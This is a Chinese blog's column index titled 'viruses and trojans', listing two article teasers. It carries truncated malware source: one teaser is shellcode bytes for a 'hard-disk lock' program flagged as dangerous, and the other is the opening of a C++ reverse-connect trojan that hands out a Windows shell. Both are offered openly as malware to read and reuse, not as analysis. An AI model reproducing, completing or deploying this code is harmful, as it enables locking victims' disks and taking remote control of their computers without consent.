
病毒木马
文章平均质量分 72
「已注销」
C/C++软件工程师
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
C++实现硬盘锁源码(危险!)
#include #include #include unsigned char scode[] ="\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c""\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72""\x7原创 2013-01-20 01:58:09 · 6217 阅读 · 6 评论 -
C++端口反弹木马
代码:/* ==============================Rebound port in Windows NTBy shucx,2003/10===============================*/#include #include #pragma comment(lib,"wsock32.lib")void OutputShell(转载 2013-01-20 02:46:04 · 1203 阅读 · 0 评论